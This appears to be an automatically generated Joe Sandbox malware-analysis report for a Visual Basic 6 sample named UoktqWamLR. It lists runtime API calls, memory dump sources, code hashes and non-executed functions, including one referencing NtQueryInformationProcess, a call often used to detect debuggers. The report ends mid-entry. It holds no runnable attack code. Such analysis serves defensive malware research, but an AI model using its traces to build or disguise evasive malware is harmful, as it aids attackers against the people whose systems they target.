Part of subcall function 004FDCA4: __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD66
Part of subcall function 004FDCA4: #644.MSVBVM60(00000000,?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD6C
Part of subcall function 004FDCA4: __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD77
Part of subcall function 004FDCA4: __vbaAryLock.MSVBVM60(004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDA8
Part of subcall function 004FDCA4: #644.MSVBVM60(B445C7BC,004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDBD
Part of subcall function 004FDCA4: __vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDC9

Part of subcall function 004FAB46: __vbaVarDup.MSVBVM60(?,?,?), ref: 004FAB86
Part of subcall function 004FAB46: #644.MSVBVM60(?,?,?), ref: 004FAB91
Part of subcall function 004FAB46: __vbaI4Var.MSVBVM60(?,00000000,?,?,?), ref: 004FAB9B
Part of subcall function 004FAB46: #698.MSVBVM60(?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 004FABD4
Part of subcall function 004FAB46: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABE5
Part of subcall function 004FAB46: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABEF
Part of subcall function 004FAB46: __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 004FABF7
Part of subcall function 004FAB46: __vbaVarAdd.MSVBVM60(?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC1E
Part of subcall function 004FAB46: __vbaVarMove.MSVBVM60(?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC28
Part of subcall function 004FAB46: __vbaFreeVar.MSVBVM60(004FAC63,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 004FAC5D

__vbaStrVarMove.MSVBVM60(?,?,00000000), ref: 004FA938
__vbaStrMove.MSVBVM60(?,?,00000000), ref: 004FA942
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 004FA94A
__vbaStrVarMove.MSVBVM60(?,?), ref: 004FA978
__vbaStrMove.MSVBVM60(?,?), ref: 004FA982
__vbaFreeVar.MSVBVM60(?,?), ref: 004FA98A
__vbaNew2.MSVBVM60(00409904,00000000,?,?), ref: 004FA99E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BDB8,00000024), ref: 004FA9DE
__vbaFreeVar.MSVBVM60(00000000,00000000,0040BDB8,00000024), ref: 004FA9E6
#644.MSVBVM60(?), ref: 004FA9EE
#644.MSVBVM60(?,?), ref: 004FA9F8
#644.MSVBVM60(?,?,?,?), ref: 004FAA15
__vbaFreeVar.MSVBVM60(?,00000000,00000008,00000040,?,?,?,?), ref: 004FAA30
__vbaFreeStr.MSVBVM60(004FAA5E,?,00000000,00000008,00000040,?,?,?,?), ref: 004FAA48
__vbaFreeObj.MSVBVM60(004FAA5E,?,00000000,00000008,00000040,?,?,?,?), ref: 004FAA50
__vbaFreeStr.MSVBVM60(004FAA5E,?,00000000,00000008,00000040,?,?,?,?), ref: 004FAA58

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Free$#644$Move$Addref$#698CastCheckHresultListLockNew2RedimUnlock
String ID:
API String ID: 4040062478-0
Opcode ID: acc528ea567939549293463f0cc3288716861410f189db9aec7b2b8db34f40d5
Instruction ID: a7d6c5a0f1ac3901d9c810be9f80c2cd68cbabe3e797a72f1fdc091d208ba30f
Opcode Fuzzy Hash: acc528ea567939549293463f0cc3288716861410f189db9aec7b2b8db34f40d5
Instruction Fuzzy Hash: 615133B1D00208AFCB15EFA5C945EDEBBB8AF08304F10412EF615BB2A1DB795909CB55

Function 004FAF77 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#644.MSVBVM60(?,004BDA58), ref: 004FAFBA
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,00000000,?,004BDA58), ref: 004FAFE1
__vbaAryLock.MSVBVM60(?,?,00000000,00000000,?,004BDA58), ref: 004FAFEF
#644.MSVBVM60(?,?,?,00000000,00000000,?,004BDA58), ref: 004FAFFE
__vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000000,?,004BDA58), ref: 004FB009

Strings

P"P, xrefs: 004FAF98

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$#644$LockRedimUnlock
String ID: P"P
API String ID: 3696664841-1596252278
Opcode ID: 7f426ee7d550ae2b9706e85dfed45df7e44756f7e23f026a5ce7ceaa6c1c9f27
Instruction ID: dc8d2fb1f54aebcb24190609aeac22538e622c01d074bb900cabc85364e7c20f
Opcode Fuzzy Hash: 7f426ee7d550ae2b9706e85dfed45df7e44756f7e23f026a5ce7ceaa6c1c9f27
Instruction Fuzzy Hash: E51142B1900219BBCB14EBA5CD46EEF7A7CEB09B14F14025AF610B72D1D77C990087A5

Function 004FFBC3 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004FF2B6: __vbaFreeVar.MSVBVM60(00000000), ref: 004FF2EE

__vbaNew2.MSVBVM60(0040C9C4,00503BA8,?,?,?,?,?,?,?,00401006), ref: 004FFC1E
__vbaNew2.MSVBVM60(0040A9A4,00503350,?,?,?,?,?,?,?,00401006), ref: 004FFC3B
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,?,?,00401006), ref: 004FFC4C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C9B4,00000010,?,?,?,?,?,?,?,00401006), ref: 004FFC65
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401006), ref: 004FFC6D

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$FreeNew2$AddrefCheckHresult
String ID:
API String ID: 3631570461-0
Opcode ID: 2aa033e1148bc61624f5aeede4ff4828d23a68183d36074aa3c8353c26f67c8a
Instruction ID: d29f9a0b0f044da0124d0a783bc6a50dd491f7716481699e81bc91bd7035dc88
Opcode Fuzzy Hash: 2aa033e1148bc61624f5aeede4ff4828d23a68183d36074aa3c8353c26f67c8a
Instruction Fuzzy Hash: 3511B271940608FBCB10EF95C886BAE7FB8FF18709F10446BF601B72E1C6785548DA99

Function 004FFA60 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

#595.MSVBVM60(?,00401006,?,?,?,00000000,00503300,00004008), ref: 004FFAB8
__vbaVarMove.MSVBVM60(?,00401006,?,?,?,00000000,00503300,00004008), ref: 004FFACD
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,00401006,?,?,?,00000000,00503300,00004008), ref: 004FFADC

Strings

`$P, xrefs: 004FFA82

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$#595FreeListMove
String ID: `$P
API String ID: 3966387967-756392544
Opcode ID: 37b824a5361ac6742d3a6563eb537019a95f6f41ad19e112f0c352c1f1e08835
Instruction ID: 891f2b33aea46b267b6743979868d3e0fcb54d0ea9a4c6a18827176b049f0892
Opcode Fuzzy Hash: 37b824a5361ac6742d3a6563eb537019a95f6f41ad19e112f0c352c1f1e08835
Instruction Fuzzy Hash: 5F1127B1C4020CAFCB01DF95DA46BDEBBF8AB08704F20412AF504B6291E7782A08CF55

Function 004FF241 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

__vbaSetSystemError.MSVBVM60(000000FF,00000022,?,00000004), ref: 004FF283

Strings

0, xrefs: 004FF277
0$P, xrefs: 004FF262

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: ErrorSystem__vba
String ID: 0$0$P
API String ID: 2404019520-4139459120
Opcode ID: d799866431c7a18ae4cb7297d6322fe07abcbc91e71e97c2b66de0163396b3f1
Instruction ID: 4d99a0426eab4ee947954a8fff2169128352dc848e46d0ebbec9f58faa289070
Opcode Fuzzy Hash: d799866431c7a18ae4cb7297d6322fe07abcbc91e71e97c2b66de0163396b3f1
Instruction Fuzzy Hash: BBE0ECB5550248BBD710EB95CD06FAE7ABCEB05B14F504359F200765C1D3BD1D04567A

Function 004FB375 Relevance: 4.5, APIs: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__vbaSetSystemError.MSVBVM60(00000000,00503300,00004008,004FF5B7,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FB37F
__vbaSetSystemError.MSVBVM60(000001F4,00000000,00503300,00004008,004FF5B7,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FB391
__vbaSetSystemError.MSVBVM60(000001F4,00000000,00503300,00004008,004FF5B7,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FB39D

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: ErrorSystem__vba
String ID:
API String ID: 2404019520-0
Opcode ID: f7878b6b3736e60cf500dfac49275aed302ffd1d4c5187b4c3af895085e5a324
Instruction ID: 927430da1242c613c9f004ef9172691e53ebef87816ae37726e7f97904a5dec2
Opcode Fuzzy Hash: f7878b6b3736e60cf500dfac49275aed302ffd1d4c5187b4c3af895085e5a324
Instruction Fuzzy Hash: C6D0173BA0002812CA2032BB188BAAF0405898A7A83060A7BF704BB286CA3C4C1142ED

Function 004FF2B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

__vbaFreeVar.MSVBVM60(00000000), ref: 004FF2EE

Part of subcall function 004FF318: __vbaFreeVar.MSVBVM60(?), ref: 004FF37D
Part of subcall function 004FF318: __vbaAryLock.MSVBVM60(004FF2F8,005032F8,?), ref: 004FF3B4
Part of subcall function 004FF318: #644.MSVBVM60(89645E5F,004FF2F8,005032F8,?), ref: 004FF3C3
Part of subcall function 004FF318: __vbaAryUnlock.MSVBVM60(004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF3CE
Part of subcall function 004FF318: __vbaObjSet.MSVBVM60(?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF3F7
Part of subcall function 004FF318: __vbaObjSetAddref.MSVBVM60(005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF406
Part of subcall function 004FF318: __vbaFreeObj.MSVBVM60(005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF40E
Part of subcall function 004FF318: __vbaObjSetAddref.MSVBVM60(?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF424
Part of subcall function 004FF318: #644.MSVBVM60(00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF42A
Part of subcall function 004FF318: __vbaFreeObj.MSVBVM60(00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF43B

Strings

@$P, xrefs: 004FF2D7

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Free$#644Addref$LockUnlock
String ID: @$P
API String ID: 419862961-358147200
Opcode ID: 64ff7cefeb3e48a656cd9a0b9cb1555721bb155294c5be21b38783e5cdbb3749
Instruction ID: 91ec96f69dfbd86fdb86f071fbb48f614a563415612bd978ac1dc7c80adad24c
Opcode Fuzzy Hash: 64ff7cefeb3e48a656cd9a0b9cb1555721bb155294c5be21b38783e5cdbb3749
Instruction Fuzzy Hash: 11E0E5B195134CBBCB04EB95CD46FAEB67CFF04B08F50052EF50162551D77C5504867A

Non-executed Functions

Function 004A746E Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

NtQueryInformationProcess, xrefs: 004A748D, 004A74AE

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID: NtQueryInformationProcess
API String ID: 0-2781105232
Opcode ID: b444e637c2b73fd6c714f4df5b72bdc10b87b3c9654d0bce9194a41c1ad82b9f
Instruction ID: 42160cc89270f790290e1fc4871cb557a562c310d1e13648765bafde3b933096
Opcode Fuzzy Hash: b444e637c2b73fd6c714f4df5b72bdc10b87b3c9654d0bce9194a41c1ad82b9f
Instruction Fuzzy Hash: DBF0A73075C100EEEA70B711CC55F262E5CFB3E714F20446BF406D6192D52CC801911A

Function 00751000 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149585167.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Offset: 00751000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_751000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9baa7ca1d690d2cd8a04312c4355e785f53248baff01656f1cc78200f7d2f94
Instruction ID: 50152dd2288ff9f22d50a686f5f12237d1fe7ff03e59f4068cbd449979ecaf76
Opcode Fuzzy Hash: c9baa7ca1d690d2cd8a04312c4355e785f53248baff01656f1cc78200f7d2f94
Instruction Fuzzy Hash: D521AFCA81EBC05FE7434A3439256922FB16B2365EB4B55DBC881DB0A3F5045A0AE722

Function 004A77C9 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
Instruction ID: f977cb42e8e1526ea90fa57e9a565b5f201d77e4fc19c840de7b6c86aa411e99
Opcode Fuzzy Hash: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
Instruction Fuzzy Hash: DD01A43661C106CBDB30BF14CC489A7B3A6FB73360F95406BD41547B14E22DEC81D6AA

Function 023536E4 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
Instruction ID: 33c833e40b49eb8191a81c155cc5b5b28581803743917eac288df2a77f91ef83
Opcode Fuzzy Hash: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
Instruction Fuzzy Hash: CFF0ED73A145749BC731DB59D480E6AB3F9EB846B0B254895E95DD7A01D330FD40CBA0

Function 004BCB45 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54b76756eadcee7a6fad7dc33b36984986ef2d9f3116deeadd9cae6966f9a68
Instruction ID: de31f8e75c8437cecb4fd1c57b7aab3bfb126175ae37faa0f44f246b263c4bf4
Opcode Fuzzy Hash: d54b76756eadcee7a6fad7dc33b36984986ef2d9f3116deeadd9cae6966f9a68
Instruction Fuzzy Hash: BDD0A725009381DFC2020A3045526F337A48B12310B0604C3948547023D65C8A82E676

Function 004BCC4B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c955feba49885877c83e8555f9f1eee84c6068569c1590036d33d388819479bb
Instruction ID: d5e2615bae4dde41bd0e0477b49a7ebe8057fcf0c86f1651a6ff121202083888
Opcode Fuzzy Hash: c955feba49885877c83e8555f9f1eee84c6068569c1590036d33d388819479bb
Instruction Fuzzy Hash: ABC02B3E0291848DCB068F1440533F43B655301340B600DC3D08387696C00C8143F03E

Function 004BCD8F Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f575302f331e920188028b263f9dbd3d41a12492a289b4a17bab70fd6897d1af
Instruction ID: e94d12df182d8059efb14aecdead26895e9d0f6b4007aac2283acea903214c66
Opcode Fuzzy Hash: f575302f331e920188028b263f9dbd3d41a12492a289b4a17bab70fd6897d1af
Instruction Fuzzy Hash: 66C08C26868880CDC70D8E1901523F427258700740B3404C3D06B0AA91E11C4A03E97F

Function 023501AE Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149983881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Offset: 02350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2350000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 949dd67e458e63fd3b0e71167456eaf83973598c28d4fb1a1081de303d78bf23
Instruction ID: a411c30f1a043a4f8659a25a9ccc74ef790e7153c93fc6b5e4b5b38ad92e9b98
Opcode Fuzzy Hash: 949dd67e458e63fd3b0e71167456eaf83973598c28d4fb1a1081de303d78bf23
Instruction Fuzzy Hash: 87C09B2656D594CED71A4B554112FBD376867015C0F541482D4C54DCA7C10C9546D596

Function 004BCE4C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00408d28294f16215a4cb47f84b6fc749005c545bafaa214ea233331ad25dcf0
Instruction ID: 98b0e72c07e5a4e937493aded209f4e1316f55c924417a8b5189d73faecc5117
